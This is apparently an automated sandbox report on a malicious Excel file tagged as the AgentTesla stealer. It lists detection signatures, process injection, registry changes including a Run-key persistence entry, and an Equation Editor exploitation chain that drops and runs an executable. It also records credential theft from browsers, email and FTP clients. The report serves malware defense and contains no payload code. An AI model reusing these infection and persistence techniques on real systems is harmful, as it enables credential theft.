Malware Analysis Report

2024-11-30 06:43

Sample ID 240604-b1at6she24
Target 85181e5805f7d9111755cb3afff215a156b86330bed4241c0383d7091e1dc8fc.xlsx
SHA256 85181e5805f7d9111755cb3afff215a156b86330bed4241c0383d7091e1dc8fc
Tags
agenttesla keylogger persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

85181e5805f7d9111755cb3afff215a156b86330bed4241c0383d7091e1dc8fc

Threat Level: Known bad

The file 85181e5805f7d9111755cb3afff215a156b86330bed4241c0383d7091e1dc8fc.xlsx was found to be: Known bad.

Malicious Activity Summary

agenttesla keylogger persistence spyware stealer trojan

AgentTesla

Detects executables referencing Windows vault credential objects. Observed in infostealers

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers

Detects executables referencing many email and collaboration clients. Observed in information stealers

Detects executables referencing many file transfer clients. Observed in information stealers

Detect packed .NET executables. Mostly AgentTeslaV4.

Downloads MZ/PE file

Blocklisted process makes network request

Reads WinSCP keys stored on the system

Reads user/profile data of web browsers

Reads user/profile data of local email clients

Abuses OpenXML format to download file from external location

Reads data files stored by FTP clients

Loads dropped DLL

Executes dropped EXE

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of SetThreadContext

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Modifies Internet Explorer settings

Uses Task Scheduler COM API

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Launches Equation Editor

Suspicious use of WriteProcessMemory

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Uses Volume Shadow Copy WMI provider

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-04 01:36

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-04 01:36

Reported

2024-06-04 01:38

Platform

win7-20240508-en

Max time kernel

144s

Max time network

125s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\85181e5805f7d9111755cb3afff215a156b86330bed4241c0383d7091e1dc8fc.xls

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Detect packed .NET executables. Mostly AgentTeslaV4.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing Windows vault credential objects. Observed in infostealers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing many email and collaboration clients. Observed in information stealers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing many file transfer clients. Observed in information stealers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Downloads MZ/PE file

Abuses OpenXML format to download file from external location

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\igcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\igcc.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\mpTrle = "C:\\Users\\Admin\\AppData\\Roaming\\mpTrle\\mpTrle.exe" C:\Users\Admin\AppData\Roaming\igcc.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1616 set thread context of 800 N/A C:\Users\Admin\AppData\Roaming\igcc.exe C:\Users\Admin\AppData\Roaming\igcc.exe

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Launches Equation Editor

exploit
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\igcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\igcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\igcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\igcc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\igcc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\igcc.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 528 wrote to memory of 1616 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\igcc.exe
PID 528 wrote to memory of 1616 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\igcc.exe
PID 528 wrote to memory of 1616 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\igcc.exe
PID 528 wrote to memory of 1616 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\igcc.exe
PID 2792 wrote to memory of 1496 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2792 wrote to memory of 1496 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2792 wrote to memory of 1496 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2792 wrote to memory of 1496 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1616 wrote to memory of 800 N/A C:\Users\Admin\AppData\Roaming\igcc.exe C:\Users\Admin\AppData\Roaming\igcc.exe
PID 1616 wrote to memory of 800 N/A C:\Users\Admin\AppData\Roaming\igcc.exe C:\Users\Admin\AppData\Roaming\igcc.exe
PID 1616 wrote to memory of 800 N/A C:\Users\Admin\AppData\Roaming\igcc.exe C:\Users\Admin\AppData\Roaming\igcc.exe
PID 1616 wrote to memory of 800 N/A C:\Users\Admin\AppData\Roaming\igcc.exe C:\Users\Admin\AppData\Roaming\igcc.exe
PID 1616 wrote to memory of 800 N/A C:\Users\Admin\AppData\Roaming\igcc.exe C:\Users\Admin\AppData\Roaming\igcc.exe
PID 1616 wrote to memory of 800 N/A C:\Users\Admin\AppData\Roaming\igcc.exe C:\Users\Admin\AppData\Roaming\igcc.exe
PID 1616 wrote to memory of 800 N/A C:\Users\Admin\AppData\Roaming\igcc.exe C:\Users\Admin\AppData\Roaming\igcc.exe
PID 1616 wrote to memory of 800 N/A C:\Users\Admin\AppData\Roaming\igcc.exe C:\Users\Admin\AppData\Roaming\igcc.exe
